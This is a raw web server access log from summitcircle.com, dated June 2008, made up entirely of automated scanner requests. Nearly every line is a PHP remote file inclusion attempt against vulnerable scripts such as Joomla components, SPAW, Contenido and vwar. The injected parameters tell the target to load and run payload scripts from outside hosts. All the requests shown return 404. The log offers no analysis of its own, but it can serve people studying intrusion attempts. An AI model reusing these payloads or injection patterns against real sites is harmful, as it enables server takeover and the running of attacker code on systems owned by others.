67.228.115.66 - - [30/Jun/2008:05:16:30 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
200.30.73.117 - - [30/Jun/2008:05:16:30 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.abunaissa.de/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
88.255.236.6 - - [30/Jun/2008:05:17:29 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.electrabike.fr/images/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
88.255.236.6 - - [30/Jun/2008:05:17:29 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.electrabike.fr/images/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
216.236.255.134 - - [30/Jun/2008:05:17:30 -0700] "GET /logs/access_071210.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
216.236.255.134 - - [30/Jun/2008:05:17:30 -0700] "GET /logs/access_071112.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
69.89.31.88 - - [30/Jun/2008:05:17:32 -0700] "GET /logs/access.log/admin/spaw/spaw_control.class.php?spaw_root=http://claro3g.freehostia.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
69.89.31.88 - - [30/Jun/2008:05:17:32 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://claro3g.freehostia.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
69.89.31.88 - - [30/Jun/2008:05:17:33 -0700] "GET /logs/admin/spaw/spaw_control.class.php?spaw_root=http://claro3g.freehostia.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
189.19.255.240 - - [30/Jun/2008:05:18:04 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
211.171.255.102 - - [30/Jun/2008:05:18:07 -0700] "GET /logs/access_071210.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://antoniodirenzo.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
211.171.255.102 - - [30/Jun/2008:05:18:07 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://antoniodirenzo.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
211.171.255.102 - - [30/Jun/2008:05:18:08 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://antoniodirenzo.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
211.171.255.102 - - [30/Jun/2008:05:18:08 -0700] "GET /logs/access_071112.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://antoniodirenzo.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
202.57.1.181 - - [30/Jun/2008:05:18:45 -0700] "GET /logs/access_080323.log/index.php?nic=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
211.171.255.102 - - [30/Jun/2008:05:19:16 -0700] "GET /logs/access_071210.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://antoniodirenzo.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
211.171.255.102 - - [30/Jun/2008:05:19:16 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://antoniodirenzo.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
211.171.255.102 - - [30/Jun/2008:05:19:16 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://antoniodirenzo.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
211.171.255.102 - - [30/Jun/2008:05:19:38 -0700] "GET /logs/access_071112.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://antoniodirenzo.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
72.29.92.223 - - [30/Jun/2008:05:19:39 -0700] "GET /logs/access_071224.log//templates/default/header.inc.php?menu=http://www.theresapridemore.com/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
72.29.92.223 - - [30/Jun/2008:05:19:39 -0700] "GET /logs/access_071224.log//templates/default/header.inc.php?menu=http://www.theresapridemore.com/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
72.29.92.223 - - [30/Jun/2008:05:19:40 -0700] "GET /logs/access_071224.log//templates/default/header.inc.php?menu=http://www.westminsterakron.com//templates/.../bp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
72.29.92.223 - - [30/Jun/2008:05:19:40 -0700] "GET //templates/default/header.inc.php?menu=http://www.theresapridemore.com/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
72.29.92.223 - - [30/Jun/2008:05:19:40 -0700] "GET /logs/access_071224.log//templates/default/header.inc.php?menu=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
72.29.92.223 - - [30/Jun/2008:05:19:40 -0700] "GET //templates/default/header.inc.php?menu=http://www.theresapridemore.com/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
72.29.92.223 - - [30/Jun/2008:05:19:41 -0700] "GET //templates/default/header.inc.php?menu=http://www.westminsterakron.com//templates/.../bp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
72.29.92.223 - - [30/Jun/2008:05:19:41 -0700] "GET //templates/default/header.inc.php?menu=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
72.29.92.223 - - [30/Jun/2008:05:19:41 -0700] "GET /logs//templates/default/header.inc.php?menu=http://www.theresapridemore.com/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
72.29.92.223 - - [30/Jun/2008:05:19:41 -0700] "GET /logs//templates/default/header.inc.php?menu=http://www.theresapridemore.com/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
72.29.92.223 - - [30/Jun/2008:05:19:42 -0700] "GET /logs//templates/default/header.inc.php?menu=http://www.westminsterakron.com//templates/.../bp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
72.29.92.223 - - [30/Jun/2008:05:19:43 -0700] "GET /logs//templates/default/header.inc.php?menu=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
216.17.101.237 - - [30/Jun/2008:05:20:16 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
69.89.31.88 - - [30/Jun/2008:05:20:46 -0700] "GET /logs/access_071224.log/admin/spaw/spaw_control.class.php?spaw_root=http://claro3g.freehostia.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
189.19.255.240 - - [30/Jun/2008:05:20:49 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
88.255.236.6 - - [30/Jun/2008:05:21:09 -0700] "GET //includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.electrabike.fr/images/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
88.255.236.6 - - [30/Jun/2008:05:21:16 -0700] "GET //includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://easyshortsalenegotiation.com/includes/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
202.57.1.181 - - [30/Jun/2008:05:21:39 -0700] "GET /logs/access.log/index.php?pag=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
202.57.1.181 - - [30/Jun/2008:05:21:40 -0700] "GET /index.php?pag=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
202.57.1.181 - - [30/Jun/2008:05:21:41 -0700] "GET /logs/index.php?pag=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
74.53.188.162 - - [30/Jun/2008:05:22:05 -0700] "GET /logs/access_071231.log//templates/default/header.inc.php?menu=http://www.westminsterakron.com//templates/.../bp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
74.53.188.162 - - [30/Jun/2008:05:22:09 -0700] "GET //templates/default/header.inc.php?menu=http://www.westminsterakron.com//templates/.../bp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
74.53.188.162 - - [30/Jun/2008:05:22:13 -0700] "GET /logs//templates/default/header.inc.php?menu=http://www.westminsterakron.com//templates/.../bp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
216.17.101.237 - - [30/Jun/2008:05:22:48 -0700] "GET /logs/access_080121.log/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
216.17.101.237 - - [30/Jun/2008:05:22:49 -0700] "GET /logs/access_070827.log/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
74.53.188.162 - - [30/Jun/2008:05:22:55 -0700] "GET /logs/access_071231.log//templates/default/header.inc.php?menu=http://www.theresapridemore.com/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
74.53.188.162 - - [30/Jun/2008:05:22:56 -0700] "GET //templates/default/header.inc.php?menu=http://www.theresapridemore.com/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
74.53.188.162 - - [30/Jun/2008:05:22:56 -0700] "GET /logs//templates/default/header.inc.php?menu=http://www.theresapridemore.com/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
74.53.188.162 - - [30/Jun/2008:05:23:14 -0700] "GET /logs/access_071231.log//templates/default/header.inc.php?menu=http://www.westminsterakron.com//templates/.../bp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
74.53.188.162 - - [30/Jun/2008:05:23:14 -0700] "GET //templates/default/header.inc.php?menu=http://www.westminsterakron.com//templates/.../bp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
74.53.188.162 - - [30/Jun/2008:05:23:20 -0700] "GET /logs//templates/default/header.inc.php?menu=http://www.westminsterakron.com//templates/.../bp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
74.53.188.162 - - [30/Jun/2008:05:23:25 -0700] "GET /logs/access_071231.log//templates/default/header.inc.php?menu=http://www.theresapridemore.com/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
74.53.188.162 - - [30/Jun/2008:05:23:25 -0700] "GET //templates/default/header.inc.php?menu=http://www.theresapridemore.com/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
74.53.188.162 - - [30/Jun/2008:05:23:25 -0700] "GET /logs//templates/default/header.inc.php?menu=http://www.theresapridemore.com/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
211.171.255.102 - - [30/Jun/2008:05:23:47 -0700] "GET /logs/access_071029.log//modules/vwar/admin/admin.php?vwar_root=http://antoniodirenzo.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
211.171.255.102 - - [30/Jun/2008:05:23:47 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://antoniodirenzo.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
211.171.255.102 - - [30/Jun/2008:05:23:48 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://antoniodirenzo.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
88.255.236.6 - - [30/Jun/2008:05:26:38 -0700] "GET //administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.electrabike.fr/images/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
88.255.236.6 - - [30/Jun/2008:05:26:44 -0700] "GET //administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://easyshortsalenegotiation.com/includes/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
74.53.188.162 - - [30/Jun/2008:05:26:45 -0700] "GET /logs/access_071231.log//templates/default/header.inc.php?menu=http://www.westminsterakron.com//templates/.../bp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
74.53.188.162 - - [30/Jun/2008:05:26:45 -0700] "GET //templates/default/header.inc.php?menu=http://www.westminsterakron.com//templates/.../bp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
74.53.188.162 - - [30/Jun/2008:05:26:45 -0700] "GET /logs//templates/default/header.inc.php?menu=http://www.westminsterakron.com//templates/.../bp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
88.255.236.6 - - [30/Jun/2008:05:27:17 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://easyshortsalenegotiation.com/includes/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
88.255.236.6 - - [30/Jun/2008:05:27:17 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://easyshortsalenegotiation.com/includes/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
88.255.236.6 - - [30/Jun/2008:05:27:44 -0700] "GET /logs/access_080331.log//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.electrabike.fr/images/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
88.255.236.6 - - [30/Jun/2008:05:27:44 -0700] "GET //includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.electrabike.fr/images/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
88.255.236.6 - - [30/Jun/2008:05:27:45 -0700] "GET /logs//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.electrabike.fr/images/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
88.255.236.6 - - [30/Jun/2008:05:27:47 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.electrabike.fr/images/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
88.255.236.6 - - [30/Jun/2008:05:27:53 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.electrabike.fr/images/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
88.255.236.6 - - [30/Jun/2008:05:28:09 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.electrabike.fr/images/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
88.255.236.6 - - [30/Jun/2008:05:28:09 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.electrabike.fr/images/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
88.255.236.6 - - [30/Jun/2008:05:28:10 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://easyshortsalenegotiation.com/includes/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
88.255.236.6 - - [30/Jun/2008:05:28:10 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://easyshortsalenegotiation.com/includes/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
216.12.200.84 - - [30/Jun/2008:05:28:20 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.summitcircle.com"
216.12.200.84 - - [30/Jun/2008:05:28:20 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.summitcircle.com"
88.255.236.6 - - [30/Jun/2008:05:28:25 -0700] "GET /logs/access_080331.log//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://easyshortsalenegotiation.com/includes/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
88.255.236.6 - - [30/Jun/2008:05:28:26 -0700] "GET //includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://easyshortsalenegotiation.com/includes/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
88.255.236.6 - - [30/Jun/2008:05:28:26 -0700] "GET /logs//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://easyshortsalenegotiation.com/includes/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
216.118.97.213 - - [30/Jun/2008:05:28:37 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
216.118.97.213 - - [30/Jun/2008:05:28:37 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
70.85.96.130 - - [30/Jun/2008:05:29:34 -0700] "GET /logs/access_080526.log//update/update2.php?lang=http://www.westminsterakron.com//templates/.../bp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
70.85.96.130 - - [30/Jun/2008:05:29:34 -0700] "GET //update/update2.php?lang=http://www.westminsterakron.com//templates/.../bp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
70.85.96.130 - - [30/Jun/2008:05:29:34 -0700] "GET /logs//update/update2.php?lang=http://www.westminsterakron.com//templates/.../bp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
67.228.115.66 - - [30/Jun/2008:05:29:45 -0700] "GET /logs/access_071210.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
67.228.115.66 - - [30/Jun/2008:05:29:45 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
67.228.115.66 - - [30/Jun/2008:05:29:46 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
67.228.115.66 - - [30/Jun/2008:05:29:46 -0700] "GET /logs/access_071112.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
211.171.255.102 - - [30/Jun/2008:05:30:07 -0700] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://antoniodirenzo.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
211.171.255.102 - - [30/Jun/2008:05:30:59 -0700] "GET /logs/access_071029.log//modules/vwar/admin/admin.php?vwar_root=http://antoniodirenzo.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
211.171.255.102 - - [30/Jun/2008:05:30:59 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://antoniodirenzo.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
211.171.255.102 - - [30/Jun/2008:05:31:00 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://antoniodirenzo.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
209.104.6.82 - - [30/Jun/2008:05:31:14 -0700] "GET /logs/access_080526.log//update/update2.php?lang=http://www.westminsterakron.com//templates/.../bp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
209.104.6.82 - - [30/Jun/2008:05:31:14 -0700] "GET //update/update2.php?lang=http://www.westminsterakron.com//templates/.../bp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
209.104.6.82 - - [30/Jun/2008:05:31:14 -0700] "GET /logs//update/update2.php?lang=http://www.westminsterakron.com//templates/.../bp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
209.104.6.82 - - [30/Jun/2008:05:31:19 -0700] "GET /logs/access_080526.log//update/update2.php?lang=http://www.theresapridemore.com/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
209.104.6.82 - - [30/Jun/2008:05:31:19 -0700] "GET //update/update2.php?lang=http://www.theresapridemore.com/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
209.104.6.82 - - [30/Jun/2008:05:31:19 -0700] "GET /logs//update/update2.php?lang=http://www.theresapridemore.com/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
209.104.6.82 - - [30/Jun/2008:05:31:30 -0700] "GET /logs/access_080526.log//update/update2.php?lang=http://www.westminsterakron.com//templates/.../bp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
209.104.6.82 - - [30/Jun/2008:05:31:30 -0700] "GET //update/update2.php?lang=http://www.westminsterakron.com//templates/.../bp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
209.104.6.82 - - [30/Jun/2008:05:31:30 -0700] "GET /logs//update/update2.php?lang=http://www.westminsterakron.com//templates/.../bp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
209.104.6.82 - - [30/Jun/2008:05:31:31 -0700] "GET /logs/access_080526.log//update/update2.php?lang=http://www.westminsterakron.com//templates/.../bp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
